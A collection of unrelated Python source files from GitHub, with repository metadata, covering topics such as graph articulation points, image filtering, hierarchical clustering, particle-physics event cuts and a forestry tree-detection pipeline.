%s" % options.keys(), type=str) args = parser.parse_args() inis_path = os.environ.get("INIS") ini = os.path.join(inis_path, "strands_data_to_qsrlib", str(args.ini)) if inis_path else args.ini cfg = ConfigParser.SafeConfigParser() if len(cfg.read(ini)) == 0: raise IOError(str(ini) + " not found") if not args.load: try: reader_load = cfg.getboolean("cad120_data_keeper", "reader_load") except ConfigParser.NoOptionError: raise try: which_qsr = options[args.qsr] except (IndexError, KeyError) as e: parser.print_help() sys.exit(1) qsrlib = QSRlib() reader = CAD120_Data_Reader(config_filename=ini, load_from_files=reader_load) print() keeper = CAD120_QSR_Keeper(description="description", reader=reader, qsrlib=qsrlib, which_qsr=which_qsr) # optional saving if args.save: keeper.save(filename=args.save) else: try: qsrs_filename = cfg.get("cad120_data_keeper", "qsrs_filename") except ConfigParser.NoOptionError: raise keeper = CAD120_QSR_Keeper(load_from_file=qsrs_filename) stop = timeit.default_timer() print("Total execution time: %.2f secs" % (stop - start))
gatsoulis/strands_data_to_qsrlib
src/cad120/cad120_qsr_keeper.py
cad120_qsr_keeper.py
py
4,946
python
en
code
0
github-code
36
70846797543
from pymongo import MongoClient from datetime import datetime import os, sys sys.path.append(os.path.join(os.path.dirname(sys.path[0]), 'backend')) import Model import Repository as repo def make_seats(secL, secH, rowL, rowH, seatL, seatH, secI=1, rowI=1, seatI=1): seats = [] for sec in range(secL, secH, secI): for row in range(rowL, rowH, rowI): for seat in range(seatL, seatH, seatI): seats.append(f"sec{sec}row{row}seat{seat}") return seats sb_seats = make_seats(100, 401, 1, 5, 1, 8, secI=100) pres_seats = make_seats(1, 2, 1, 30, 1, 6) yesterday_seats = make_seats(1, 2, 1, 2, 1, 2) suberbowl = Model.Event({'start_time': datetime(2020, 2, 2, 19, 0, 0), 'team1': "Jets", 'team2': "Bengals", 'location': "Miami, FL", 'event_type': "NFL", 'period_count': 4, 'seats': sb_seats, 'event_name': "Suberb Owl"}) my_393_presentation = Model.Event({'start_time': datetime(2019, 12, 6, 11, 40, 0), 'team1': "us", 'team2': "Rohan & Anthony", 'location': "Bingham", 'event_type': "Presentation", 'period_count': 4, 'seats': pres_seats, 'event_name': "My 393 Presentation"}) yesterday = Model.Event({'start_time': datetime(2019, 12, 3, 0, 0, 0), 'team1': "today", 'team2': "tomorrow", 'location': "Yes", 'event_type': "Life", 'period_count': 1, 'seats': yesterday_seats, 'event_name': "Yesterday"}) repo.add_event(suberbowl) repo.add_event(my_393_presentation) repo.add_event(yesterday) #print current events and ID's for convenince print('Events currently in database:') for event in repo.get_all_events(): print(f'Event name: {event.event_name}, ID: {event._id}')
DannyBarbaro/SeatSwap
db_code/EventCreator.py
EventCreator.py
py
1,618
python
en
code
0
github-code
36
27894883857
def articulation_points_util(graph, u, visited, disc, low, parent, time, result): visited[u] = True disc[u] = time[0] low[u] = time[0] time[0] += 1 children = 0 for v, w in enumerate(graph[u]): if w: if v == parent[u]: continue elif visited[v]: low[u] = min(low[u], disc[v]) else: children += 1 parent[v] = u articulation_points_util(graph, v, visited, disc, low, parent, time, result) low[u] = min(low[u], low[v]) if parent[u] != -1 and low[v] >= disc[u]: result.append(u) if parent[u] == -1 and children > 1: result.append(u) def articulation_points(graph): n = len(graph) result = [] visited = [False for _ in range(n)] parent = [-1 for _ in range(n)] disc = [float('inf') for _ in range(n)] low = [float('inf') for _ in range(n)] time = [0] for i in range(n): articulation_points_util(graph, i, visited, disc, low, parent, time, result) return result if __name__ == "__main__": graph = [ [0, 1, 1, 0, 0], [1, 0, 1, 0, 0], [1, 1, 0, 1, 1], [0, 0, 1, 0, 1], [0, 0, 1, 1, 0], ] print(articulation_points(graph))
stgleb/algorithms-and-datastructures
graphs/articulation_points.py
articulation_points.py
py
1,325
python
en
code
0
github-code
36
3721701885
import environ from io import BytesIO from PIL import Image, ImageFilter env = environ.Env() FILTERED_FILES = env('FILTERED_FILES', default='process_service/tmp/filtered') def filter(file, filename, ext, method='blur', is_file=False): filt = filt_obj.get(method, None) Filter = getattr(ImageFilter, filt) try: img = Image.open(file) if is_file else Image.open(BytesIO(file)) img = img.filter(Filter) filename = f'{filename}_filtered.{ext}' img.save(f'{FILTERED_FILES}/{filename}') return filename except OSError as e: print("Cannot filter this file", filename) print(e) filt_obj = { "blur": "BLUR", "contour": "CONTOUR", "detail": "DETAIL", "edge_enhance": "EDGE_ENHANCE", "emboss": "EMBOSS", "find_edges": "FIND_EDGES", "sharpen": "SHARPEN", "smooth": "SMOOTH", }
olacodes/prog-image
process_service/filtering/filter.py
filter.py
py
875
python
en
code
1
github-code
36
22153329187
x = int(input()) for i in range(x): a, b = list(map(int, input().split())) result = b - a d = result % 2 if result > 0: if d == 0: print(2) else: print(1) elif result < 0: if d == 0: print(1) else: print(2) else: print(0) ''' for i in range(int(input())): a, b = list(map(int, input().split())) result = b - a answer = 2 if result > 0 and result % 2 != 0: answer = 1 elif result < 0 and result % 2 == 0: answer = 1 elif result == 0: answer = 0 print(answer) '''
saurav912/Codeforces-Problemset-Solutions
CDFAddOddorSubtractEven.py
CDFAddOddorSubtractEven.py
py
658
python
en
code
0
github-code
36
20832740847
import awkward as ak from pocket_coffea.lib.cut_definition import Cut def dilepton(events, params, year, sample, **kwargs): MET = events[params["METbranch"][year]] # Masks for same-flavor (SF) and opposite-sign (OS) SF = ((events.nMuonGood == 2) & (events.nElectronGood == 0)) | ( (events.nMuonGood == 0) & (events.nElectronGood == 2) ) OS = events.ll.charge == 0 # SFOS = SF & OS not_SF = (events.nMuonGood == 1) & (events.nElectronGood == 1) mask = ( (events.nLeptonGood == 2) & (ak.firsts(events.LeptonGood.pt) > params["pt_leading_lepton"]) & (events.nJetGood >= params["njet"]) & (events.nBJetGood >= params["nbjet"]) & (MET.pt > params["met"]) & OS ) # Pad None values with False return ak.where(ak.is_none(mask), False, mask) dilepton_presel = Cut( name="dilepton", params={ "METbranch": { '2016_PreVFP': "MET", '2016_PostVFP': "MET", '2017': "MET", '2018': "MET", }, "njet": 2, "nbjet": 0, "pt_leading_lepton": 15, "met": 10, }, function=dilepton, )
ryanm124/AnalysisConfigs
configs/ttHbb/custom_cut_functions.py
custom_cut_functions.py
py
1,172
python
en
code
null
github-code
36
72219406185
import math import os.path from os.path import join import random import torch from torch.utils.data import DataLoader, Dataset from typing import Dict, AnyStr, Any from torchvision.transforms import transforms from .image_folder import is_image_file, make_dataset from PIL import Image import numpy as np from PIL import ImageFile ImageFile.LOAD_TRUNCATED_IMAGES = True to_tensor = transforms.Compose([ transforms.ColorJitter(brightness=0.5, contrast=0.5, saturation=0.5, hue=0.5), transforms.ToTensor()]) class GTA5Dataset(Dataset): def __init__(self, root, size=None, is_round=True, downsample=1, ext="png", resize=None): super(GTA5Dataset, self).__init__() self.root = root self.origin_path = sorted(make_dataset(self.root + "/images/")) self.origin_size = len(self.origin_path) self.round = is_round self.patch_size = 256 self.resize = resize if size is None: self.size = len(self.origin_path) else: self.size = min(size, len(self.origin_path)) def __len__(self) -> int: return self.size def __getitem__( self, index: int ) -> Dict[AnyStr, Any]: if index > self.size: raise IndexError("out of the range, indexed %d-th image, but have %d images in total." % (index, self.size)) paths = self.origin_path[index] org_input = Image.open(paths).convert("RGB").resize((640, 480)) edge_input = Image.open(paths.replace("images", "labels")).convert("RGB").resize((640, 480)) #.resize((256, 256)) if self.resize is not None : org_input, edge_input = org_input.resize(self.resize), edge_input.resize(self.resize) return to_tensor(org_input), \ to_tensor(edge_input), \ "".join(self.origin_path[index % self.origin_size].split('/')[-1].split(".")[:-1])
leelxh/Adaptive-Texture-Filtering-for-Single-Domain-Generalized-Segmentation
texture_filter/datasets/smoothing_dataset.py
smoothing_dataset.py
py
1,899
python
en
code
5
github-code
36
21189060933
class Solution: def countBits(self, n: int) -> List[int]: # 결과값을 저장할 list를 미리 선언해준다. results = [0] # 1부터 n까지의 반복횟수를 지정해준다. for i in range(1, n+1): # i와 i-1의 비트 AND연산을 수행& +1하여 가장 오른쪽 비트를 제거 -> 1의 개수를 센다. results.append(results[i & i-1] + 1) return results
KimGiii/Algorithm
0338-counting-bits/0338-counting-bits.py
0338-counting-bits.py
py
438
python
ko
code
0
github-code
36
12040540403
import os, sys, logging, glob2, csv import numpy as np import pandas as pd from sklearn.metrics.pairwise import cosine_similarity def create_directory(name): """ Create directory if not exists Parameters ---------- name : string name of the folder to be created """ try: if not os.path.exists(name): os.makedirs(name) logging.info('Created directory: {}'.format(name)) except Exception(e): logging.error("[{}] : {}".format(sys._getframe().f_code.co_name,e)) def read_directory(directory): """ Read file names from directory recursively Parameters ---------- directory : string directory/folder name where to read the file names from Returns --------- files : list of strings list of file names """ try: return glob2.glob(os.path.join(directory, '**' , '*.*')) except Exception(e): logging.error("[{}] : {}".format(sys._getframe().f_code.co_name,e)) def save_csv(data, name, folder): """ Save list of list as CSV (comma separated values) Parameters ---------- data : list of list A list of lists that contain data to be stored into a CSV file format name : string The name of the file you want to give it folder: string The folder location """ try: # create folder name as directory if not exists create_directory(folder) # create the path name (allows for .csv and no .csv extension to be handled correctly) suffix = '.csv' if name[-4:] != suffix: name += suffix # create the file name path = os.path.join(folder, name) # save data to folder with name with open(path, "w") as f: writer = csv.writer(f, lineterminator='\n') writer.writerows(data) except Exception(e): logging.error('[{}] : {}'.format(sys._getframe().f_code.co_name,e)) def calculate_hellinger_distance(p, q): """ Calculate the hellinger distance between two probability distributions note that the hellinger distance is symmetrical, so distance p and q = q and p other measures, such as KL-divergence, are not symmetric but can be used instead Parameters ----------- p : list or array first probability distribution q : list or array second probability distribution Returns -------- hellinger_dinstance : float hellinger distance of p and q """ return np.sqrt(np.sum((np.sqrt(p) - np.sqrt(q)) ** 2)) / np.sqrt(2) def calc_cosine(vec_a, vec_b): return cosine_similarity([vec_a], [vec_b])[0][0] def read_vectors(file): attract_repel_skills = pd.read_csv(file, sep=" ", header=None) attract_repel_skills['vector'] = attract_repel_skills[attract_repel_skills.columns[1:]].values.tolist() attract_repel_skills.rename(columns={0:'id'}, inplace=True) attract_repel_skills = attract_repel_skills[['id', 'vector']].set_index('id') return attract_repel_skills
stannida/skill-embeddings
utils/helper_functions.py
helper_functions.py
py
3,147
python
en
code
1
github-code
36
14487480169
import urllib.request, urllib.parse from difflib import SequenceMatcher import json from msvcrt import getch serviceurl = 'http://www.omdbapi.com/?' apikey = '&apikey='+'da05069b' abv90=[] def match(s1, s2): s2p=s2[0:len(s1)] s1p=''.join(d for d in s1 if d.isalnum()) s2p=''.join(d for d in s2p if d.isalnum()) print("\n"+s1p+"--->"+s2p+"\n") return SequenceMatcher(None, s1p, s2p ).ratio()*100 def search_movie(search): if len(search) < 1: return None try: url = serviceurl + urllib.parse.urlencode({'s': search})+apikey print(f'Retrieving the data of "{search}" now... \n') uh = urllib.request.urlopen(url) print(url+"\n") data = uh.read() json_data=json.loads(data) # list_keys=['Title', 'Year', 'Rated', 'Released', 'Runtime', 'Genre', 'Director', 'Writer', # 'Actors', 'Plot', 'Language', 'Country', 'Awards', 'Ratings', # 'Metascore', 'imdbRating', 'imdbVotes', 'imdbID'] if json_data['Response']=='True': for k in json_data["Search"]: print(k['Title']) for k in json_data["Search"]: print("Similarity "+str(match(str(k['Title']),fn))) if match(str(k['Title']),fn)>=90.0: abv90.append(str(k['Title'])) except Exception as e: print(f"ERROR: {e}") search = input('\nEnter: ') fn=input("\nEnter filename\n") search_movie(search) print("Most similar..\n") for i in abv90: print(i) getch()
souvikchakraborty98/QuickScripts
z_test_1.py
z_test_1.py
py
1,554
python
en
code
0
github-code
36
14072972599
import player def get_player_details(): # Fill the code for getting user inputs and creating the card object name=input("Enter the Player Name :") matches=int(input("Enter the No of Matches Played:")) player_obj=player.Player(name,matches) return player_obj player_obj = get_player_details() no_of_matches_won = int(input("Enter the No of Matches Won:")) # Fill the code here for invoking the calculate_points() and find_status_category() player_obj.calculate_points(no_of_matches_won) player_obj.find_status_category() print("Status Category:", player_obj.get_status_category())
vivek0807/AllCodes
Python/main.py
main.py
py
607
python
en
code
1
github-code
36
74792104104
# this is not CURE, just heirarchical clustering # this is used to practice making a clustering algorithm import numpy as np import matplotlib.pyplot as plt import math # a vertex is just an x position and a y position # this makes is easier for grouping vertices together # rather than having 2 arrays for the x and y positions I can have 1 array with the x and y positions together # I could have just used tuples or something but I prefer to have my own class class Vertex: def __init__(self, _x=0, _y=0): self.x = _x self.y = _y def __repr__(self): return f"({self.x}, {self.y})" # A Cluster is an array of vertices, a centroid, and a radius # this makes it easier than having a multi-dimensional array of vertices # each cluster can easily calculate its own centroid class Cluster: def __init__(self, _vertices=[]): self.vertices = _vertices self.centroid = Vertex() self.calc_centroid() self.radius = self.calc_radius() def __repr__(self): return str(self.vertices) def calc_centroid(self): x_sum = 0 y_sum = 0 for c in self.vertices: x_sum += c.x y_sum += c.y self.centroid = Vertex(x_sum/len(self.vertices), y_sum/len(self.vertices)) def calc_radius(self): radius = 0 for v in self.vertices: distance = euclidean_distance(v, self.centroid) if distance > radius: radius = distance return radius class Entry: def __init__(self, key, val): self.key = key self.value = val # i had to make my own map structure # because the map given by python wasn't what I was looking for class ClusterMap: def __init__(self): self.entries = [] def getValue(self, key): # get the value at the key for e in self.entries: if e.key == key: return e.value def add(self, key, value): # adds a new key value pair if not self.contains(key): self.entries.append(Entry(key, value)) def contains(self, key): for e in self.entries: if e.key == key: return True return False def set(self, key, value): # updates the value for a given key if not self.contains(key): self.add(key, value) return for e in self.entries: if e.key == key: e.value = value break # calculates the number of vertices in a list of clusters def num_vertices(clusters): count = 0 for c in clusters: count += len(c.vertices) return count # concatenates 2 clusters and returns the new cluster def concat_clusters(c1, c2): vertices = c1.vertices + c2.vertices return Cluster(vertices) # calculates the euclidean distance between 2 vertices def euclidean_distance(v1, v2): dx = abs(v2.x-v1.x) dy = abs(v2.y-v1.y) return math.sqrt(dx**2 + dy**2) # draws a graph with x and y values def draw_graph(clusters): x, y = get_raw_xy(clusters) # print(x) # print(y) fig, ax = plt.subplots() for cluster in clusters: _x = cluster.centroid.x _y = cluster.centroid.y circle = plt.Circle((_x, _y), cluster.radius+1, color='blue', fill=False) ax.add_patch(circle) ax.set_ylim(1,100) ax.set_xlim(1,100) ax.plot(x, y, 'o', color='black') plt.show() # gets the raw x and y data as their own lists from a list of clusters def get_raw_xy(clusters): x = [] y = [] for c in clusters: for v in c.vertices: x.append(v.x) y.append(v.y) return x, y # not currently used by the algorithm def f(avg, density): a = 0.2 return a - ((-avg/density)+1)*a # not currently used by the algorithm def calc_density(cluster): max_x, max_y = 0 min_x, min_y = math.inf for vertex in cluster: if vertex.x > max_x: max_x = vertex.x if vertex.y > max_y: max_y = vertex.y if vertex.x < min_x: min_x = vertex.x if vertex.y < min_y: min_y = vertex.y x = max_x - min_x y = max_y - min_y area = x * y density = len(cluster.vertices) / area return density # print information about the clusters def print_clusters(clusters): print(f'Cluster Count: {len(clusters)}') print(f'Vertex Count: {num_vertices(clusters)}') for c in clusters: for v in c.vertices: print(v, end='') print('\n') # returns a random set of vertices as an x array and a y array def random_vertices(count): x = np.random.randint(low=1, high=100, size=count) y = np.random.randint(low=1, high=100, size=count) return x, y # this will return vertices that are very obviously have their own clusters # only used for debugging purposes def cluster_test_vertices(count): vertices = int(count/4) lowest_low = 5 highest_low = 25 lowest_high = 75 highest_high = 95 x0 = np.random.randint(low=lowest_low, high=highest_low, size=vertices) y0 = np.random.randint(low=lowest_low, high=highest_low, size=vertices) x1 = np.random.randint(low=lowest_low, high=highest_low, size=vertices) y1 = np.random.randint(low=lowest_high, high=highest_high, size=vertices) x2 = np.random.randint(low=lowest_high, high=highest_high, size=vertices) y2 = np.random.randint(low=lowest_high, high=highest_high, size=vertices) x3 = np.random.randint(low=lowest_high, high=highest_high, size=vertices) y3 = np.random.randint(low=lowest_low, high=highest_low, size=vertices) x = np.concatenate((x0, x1, x2, x3), axis=0) y = np.concatenate((y0, y1, y2, y3), axis=0) return x, y # this is the main heirarchical clustering algorithm def hierarchical_clustering(vertex_count, goal_cluster_count): # generates random x and y values for the vertices x, y = random_vertices(vertex_count) # x, y = cluster_test_vertices(vertex_count) # static data for debugging purposes # x = [12, 9, 18, 70, 75, 85, 30, 60, 70, 20] # y = [60, 70, 66, 80, 77, 85, 50, 20, 22, 20] clusters = [] # the list of the clusters # make clusters out of the randomly generated x and y values for i in range(vertex_count): v = Vertex(x[i], y[i]) cluster = Cluster([v]) clusters.append(cluster) # num_clusters is the number of clusters that has been created by the algorithm # it is first equal to the size of the array becasue each vertex is originally its own cluster num_clusters = len(clusters) # this is the main algorithm and it will loop until the goal number of clusters has been reached # basically it works by finding the closest cluster for every cluster # then the algorithm puts all the closest pairs into map data structure # then it loops over the map and finds the pair of clusters that are closest to each other # it combines those clusters into a new cluster, deletes the old clusters and appends the new cluster # this is about the slowest way to do this but it actually works really well while num_clusters > goal_cluster_count: c_map = ClusterMap() # a cluster map will map a cluster to its closest neighbor # find all the closest points and add them to the map for i in range(len(clusters)): nearest_neighbor_distance = math.inf for j in range(len(clusters)): if i != j: # so a cluster doesn't consider itself as its closest neighbor distance = euclidean_distance(clusters[i].centroid, clusters[j].centroid) if distance < nearest_neighbor_distance: nearest_neighbor_distance = distance c_map.set(clusters[i], clusters[j]) closest_pair = 0 # index of closest pair closest_pair_distance = math.inf # loops over all the entries and finds the closest pair of clusters for i in range(len(c_map.entries)): e = c_map.entries[i] distance = euclidean_distance(e.key.centroid, e.value.centroid) if distance < closest_pair_distance: closest_pair = i closest_pair_distance = distance # make a new cluster, delete the old ones, and add the new one closest_clusters = c_map.entries[closest_pair] new_cluster = concat_clusters(closest_clusters.key, closest_clusters.value) clusters.remove(closest_clusters.key) clusters.remove(closest_clusters.value) clusters.append(new_cluster) num_clusters = len(clusters) # print(f'len clusters: {len(clusters)}') # print_clusters(clusters) draw_graph(clusters) def main(): count_vertices = 100 desired_cluster_count = 30 hierarchical_clustering(count_vertices, desired_cluster_count) if __name__ == "__main__": main()
AdamPoper/CPSC-480-CURE-Clustering
heirarchical_clustering.py
heirarchical_clustering.py
py
9,062
python
en
code
0
github-code
36
12248576934
###################################################################### # Script for processing Diss. # # (C) Christoph Schaller, BFH ###################################################################### import os import sys import math import glob import numpy as np import fiona from shapely.geometry import Point, box from osgeo import ogr PYFINT_HOME = os.environ.get("PYFINT_HOME") sys.path.append(PYFINT_HOME) from pyfintcontroller import * FINTCH_HOME = os.environ.get("FINTCH_HOME") sys.path.append(os.path.join(FINTCH_HOME,"Common")) from fintch_utilities import * import numpy as np import pandas as pd import geopandas as gpd from osgeo import ogr, osr, gdal import psycopg2 from shapely.wkt import dumps, loads import configparser from datetime import datetime, date, time, timedelta import time from multiprocessing import Process, Pool, Queue, JoinableQueue, current_process, freeze_support from queue import Empty import logging import traceback import fintch_processing_core_pub def worker(q, work_function, cfg): db_connection = psycopg2.connect(host=cfg.get("AP07__db","host"), dbname=cfg.get("AP07__db","dbname"), user=cfg.get("AP07__db","user"), password=cfg.get("AP07__db","password")) configure_log(cfg) current_forest_mask_path = None current_trasse_mask_path = None forest_mask_df = None while True: #Consume work as long as there are items in the queue try: flaeche_record = q.get() if flaeche_record == None: q.task_done() print("Queue End") break if "waldmaske" in flaeche_record and flaeche_record["waldmaske"] != None and flaeche_record["waldmaske"] != "" : if flaeche_record["waldmaske"] != current_forest_mask_path: current_forest_mask_path = flaeche_record["waldmaske"] forest_mask_df = gpd.read_file(current_forest_mask_path) flaeche_record["waldmaske_df"] = forest_mask_df if "trasse_maske" in flaeche_record and flaeche_record["trasse_maske"] != None and flaeche_record["trasse_maske"] != "": if flaeche_record["trasse_maske"] != current_trasse_mask_path: current_trasse_mask_path = flaeche_record["trasse_maske"] trasse_mask_df = gpd.read_file(current_trasse_mask_path) flaeche_record["trasse_mask_df"] = trasse_mask_df work_function(flaeche_record,db_connection) q.task_done() except Empty: print("Queue empty") break #No more work available print("Exit:",current_process()) db_connection.close() return def process_record_setup(parameter_sets, reference_plot_df, flaeche_id_column, flaeche_info_df, veg_zone_df, dhm, plot_radius, process_function, table_schema, table_base_name, cfg, result_base_path, log_path, num_processes = 1): # Create queues records = [] for i,plot in reference_plot_df.iterrows(): flaeche = flaeche_info_df[flaeche_info_df["Flaeche_ID"]==plot[flaeche_id_column]].iloc[0] if flaeche["VHM"]!=flaeche["VHM"]: # False if values is nan # Info needed for processing not present -> skip plot continue vhm_path = flaeche["VHM"] plot_center_geom = plot.geometry x = plot_center_geom.x y = plot_center_geom.y plot_area_geom = plot_center_geom.buffer(plot_radius, resolution=16) perimeter_record = { "parameter_sets": parameter_sets, "perimeter_id": plot["OBJECTID"], "geom_center":plot_center_geom, "geom_flaeche":plot_area_geom, "vhm_input_file": vhm_path, "geometry": plot_center_geom, "flaeche_id": int(plot["plot_id"] if plot["plot_id"]>0 else int(plot["OBJECTID"])), "quelle_id": plot["source_id"], "result_base_path": result_base_path, "log_path": log_path, "plot_radius" : 12.62, "perimeter_buffer" : 37.5, "grid_step": 25, "perimeter_buffer2" : 75, "grid_step2" : 50, "r_max" : cfg.getfloat("AP07__pyfint","r_max"), "epsg" : cfg.get("AP07__pyfint","epsg"), "crs" : {'init': "epsg:"+cfg.get("AP07__pyfint","epsg")}, "table_schema": table_schema, "table_base_name": table_base_name, "mischungsgrad": flaeche["Mischungsgrad"], "vhm_input_file_150": flaeche["VHM_150"], "waldmaske": flaeche["Waldmaske"], "veg_zones": veg_zone_df, "dhm": dhm } records.append(perimeter_record) return records def process_records(process_records, process_function, num_processes = 1): # Create queues perimeter_queue = JoinableQueue() #Insert records into queue for r in process_records: perimeter_queue.put(r) #Create and start worker processes processes = [] for i in range(num_processes): perimeter_queue.put(None) proc = Process(target=worker, args=(perimeter_queue,process_function,cfg,)) processes.append(proc) print("Start: ",proc) proc.start() perimeter_queue.join() # for p in processes: # if p.exitcode == None: # p.terminate() print("Processing finished") def process_records_linear(process_records, process_function, num_processes = 1): # Create queues perimeter_queue = JoinableQueue() #Insert records into queue for r in process_records: perimeter_queue.put(r) # break print("Start:") worker(perimeter_queue,process_function,cfg) print("Processing finished") def configure_log(cfg): log_path = cfg.get("AP07__fintch_processing_paths","log_path") logfile_info_path = os.path.join(log_path, current_process().name+"_info.log") logfile_error_path = os.path.join(log_path, current_process().name+"_error.log") log_format = "%(asctime)s; %(processName)s; %(levelname)s; %(name)s; %(message)s" # comment this to suppress console output stream_handler = logging.StreamHandler() file_handler_info = logging.FileHandler(logfile_info_path, mode='w') file_handler_info.setLevel(logging.INFO) file_handler_error = logging.FileHandler(logfile_error_path, mode='w') file_handler_error.setLevel(logging.ERROR) logging.basicConfig( level=logging.INFO, format=log_format, handlers=[ stream_handler, file_handler_info, file_handler_error ]) sys.stdout = LogFile('stdout') sys.stderr = LogFile('stderr') # Default entry point if __name__ == "__main__": start_time = time.time() #Setup detection path_to_config_file = os.environ['FINTCH_CONFIG_HOME'] ini_config_file = os.path.join(path_to_config_file, "FINTCH_config.ini") cfg = configparser.ConfigParser() cfg._interpolation = configparser.ExtendedInterpolation() cfg.read(ini_config_file) result_base_path = r"F:\fint-ch\Geodaten\diss\Results" log_path = os.path.join(result_base_path, "procesing_log") flaechen_info_path = r"F:\fint-ch\Geodaten\diss\kantone_info.csv" reference_plot_path = r"F:\fint-ch\Geodaten\diss\reference_plots.shp" flaeche_id_column = "KANTONSNUM" dhm_path = r"E:\GIS_Projekte\Geodaten\DHM25\TIFF\dhm25_grid_raster.tif" veg_zone_gdb_path = r"F:\fint-ch\Geodaten\diss\Vegetationshöhenstufen_BAFU\veg_zones.gdb" veg_zone_table = "Vegetationshoehenstufen_1995" plot_radius = 25 reference_plot_df = gpd.read_file(reference_plot_path) flaeche_info_df = pd.read_csv(flaechen_info_path, delimiter=";") veg_zone_df = gpd.read_file(veg_zone_gdb_path, layer=veg_zone_table) ensure_dir(result_base_path) ensure_dir(log_path) truncate = True configure_log(cfg) table_schema = "fintch" table_base_name = "diss" table_owner = "geoserver" db_connection = psycopg2.connect(host=cfg.get("AP07__db","host"), dbname=cfg.get("AP07__db","dbname"), user=cfg.get("AP07__db","user"), password=cfg.get("AP07__db","password")) srid = cfg.get("AP07__pyfint","epsg") fintch_processing_core_pub.create_db_tables(table_schema,table_base_name,table_owner,srid,db_connection) parameter_sets = { 1 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":"", "gauss_size":"", "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 2 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":"", "gauss_size":"", "resize_method":"bilinear", "resize_resolution":1.5, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 3 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":"", "gauss_size":"", "resize_method":"bilinear", "resize_resolution":2, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 4 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":1, "gauss_size":3, "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 5 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":1, "gauss_size":5, "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 6 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":1, "gauss_size":7, "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 7 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":2, "gauss_size":3, "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 8 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":2, "gauss_size":5, "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 9 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":2, "gauss_size":7, "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 10 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":3, "gauss_size":3, "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 11 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":3, "gauss_size":5, "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 12 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":3, "gauss_size":7, "resize_method":"bilinear", "resize_resolution":1, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 13 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":2, "gauss_size":3, "resize_method":"bilinear", "resize_resolution":1.5, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 14 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":2, "gauss_size":5, "resize_method":"bilinear", "resize_resolution":1.5, "output_suffix":"", "preprocessing":"", "postprocessing":""}, 15 : {"dbh_function":"2.52*H^0.84", "randomized":False, "random_variance":0, "altitutde_allowed":False, "minimum_detection_tree_height":1, "minimum_tree_height":3, "gauss_sigma":2, "gauss_size":7, "resize_method":"bilinear", "resize_resolution":1.5, "output_suffix":"", "preprocessing":"", "postprocessing":""}, } #prepare jobs/job records records = process_record_setup(parameter_sets, reference_plot_df, flaeche_id_column, flaeche_info_df, veg_zone_df, dhm_path, plot_radius, fintch_processing_core_pub.process_perimeter_dem, table_schema, table_base_name, cfg, result_base_path, log_path, num_processes = 1) #process perimeter (FST, Vegetation Zones, Terrain) process_records(records,fintch_processing_core_pub.process_perimeter, num_processes = 20) #process detection process_records(records,fintch_processing_core_pub.process_detection, num_processes = 40) #process detection with Eysn LM + Filter preprocessing/parameterset_id:30 process_records(records,fintch_processing_core_pub.process_detection_eysn_lm_filter, num_processes = 40) #process detection with Kaartinen FGI_LOCM without Watershed/parameterset_id:31 process_records(records,fintch_processing_core_pub.process_detection_kaartinen_fgi_locm, num_processes = 40) db_connection.close() print("TOTAL PROCESSING TIME: %s (h:min:sec)" % str(timedelta(seconds=(time.time() - start_time))))
HAFL-WWI/FINTCH-publication-code
2022-improving-local-maxima-idt/python/detection/Processing/fintch_processing_process_pub.py
fintch_processing_process_pub.py
py
14,644
python
en
code
0
github-code
36
40571855871
